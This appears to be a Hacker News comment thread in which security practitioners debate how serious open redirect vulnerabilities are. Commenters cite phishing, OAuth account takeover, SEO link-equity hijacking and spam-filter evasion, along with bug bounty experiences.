I don't know, I think this case is pretty flimsy. In practice, the value of an open redirect against modern applications is for "phishing". But speaking as someone who has dealt with several ATO dramas over the past two years: users will click on anything. They're not hovering over links to make sure they're safe.<p>Open redirects are worth fixing, but they're a lot more common than I think people expect they are. I think the severity:low the "good" (unconstrained, straightforward links, persistent, across all browsers) ones get is well measured.<p>I see open redirects as sort of the archetype of the "t-shirt vulnerability" --- the one the bug bounty sends you swag, instead of cash, for finding.
A decade ago people were using Google redirects to lure people into visiting shock sites.<p>Back then, it seemed reasonable to not consider this a real security flaw. Now that everyone has a Google account, the possibility of credential theft seems like something worth taking seriously.<p>At the very least, either host the redirect on a domain that is clearly distinct from the domain users log into, or ignore the destination parameter if the referrer is not a trusted source.<p>Now I'm wondering if this is also a potential vector for DDoS attacks against a third party. Widely distribute links "to a cute puppy on Instagram" that redirect to a URL that triggers a resource-intensive search operation on the victim's server? (Bonus points if the redirect points to a page that loads an actual cute puppy in one frame, and targets the victim with a 1-pixel frame.)<p>It sounds like a stretch, but I can't rule the possibility out. Even if it can't be used to launch a DDoS, I could see it being used for advertising fraud.
The problem is that often Open Redirects can be leveraged in unexpected ways, beyond the conventional attacks listed.<p>I have previously been awarded a bug bounty by Google for an issue that leveraged open redirects on victim sites to hijack their link equity (PageRank): <a href="http://www.tomanthony.co.uk/blog/google-login-hijack/" rel="nofollow">http://www.tomanthony.co.uk/blog/google-login-hijack/</a><p>It would have allowed a non-trivial financial impact on victim companies.<p>Secondly, I submitted an issue to Google which leveraged open redirects on their properties to hijack the login flow (i.e. a user is on an official Google page, selects a user and is redirected to an attacker for the password prompt - halfway through the login flow, when a user has likely already established they are on a real site): <a href="http://www.tomanthony.co.uk/blog/google-login-hijack/" rel="nofollow">http://www.tomanthony.co.uk/blog/google-login-hijack/</a><p>Sometimes open redirects are unavoidable, but all too often they aren't necessary and so it is simply lazy to not fix them and point to Google and others who mark them as WONTFIX as reason not to bother doing so yourself.
Surprised the author doesn't mention oauth - open redirects are the achilles' heel of oauth flows and allow for full account takeovers. It is very common.
They're also really useful for evading spam filters. I found[1] a bunch of government domains with open redirects.<p>Spammers were sending out emails containing links to `example.gov.uk/redirect?url=dodgy-viagra.ph` - and certain spam filters were trained to whitelist "trusted" domains.<p>You also see a lot of open redirect abuse on forums - especially where they're configured to only show the first few dozen characters of a link.<p>[1] <a href="https://www.openbugbounty.org/researchers/edent/" rel="nofollow">https://www.openbugbounty.org/researchers/edent/</a>
Open redirect alone doesn't look dangerous. But combining it with another vulnerabilities like OAuth misconfiguration -> account takeover. I wrote a blog about this common mistake some time ago:
<a href="https://pwn.netlify.com/open-redirect-to-oauth-token-theft.html" rel="nofollow">https://pwn.netlify.com/open-redirect-to-oauth-token-theft.h...</a>
If you ever get a third party penetration test, this is like, the first thing they find. To say "no one but attackers cares about," is pretty nonchalant – we immediately patched up this clearly bad attack vector, despite it not being extremely likely to manifest as a serious problem to us, because, like, you should just do that.
Open redirects are also used for SEO spam to hijack domain authority and other nefarious purposes.<p>It's silly that these big tech companies won't fix them.
I once reported an open redirect attack to GitHub, and they were like, nah, WONTFIX. I believe the issue still exists.<p>That said, how useful is an open redirect attack really?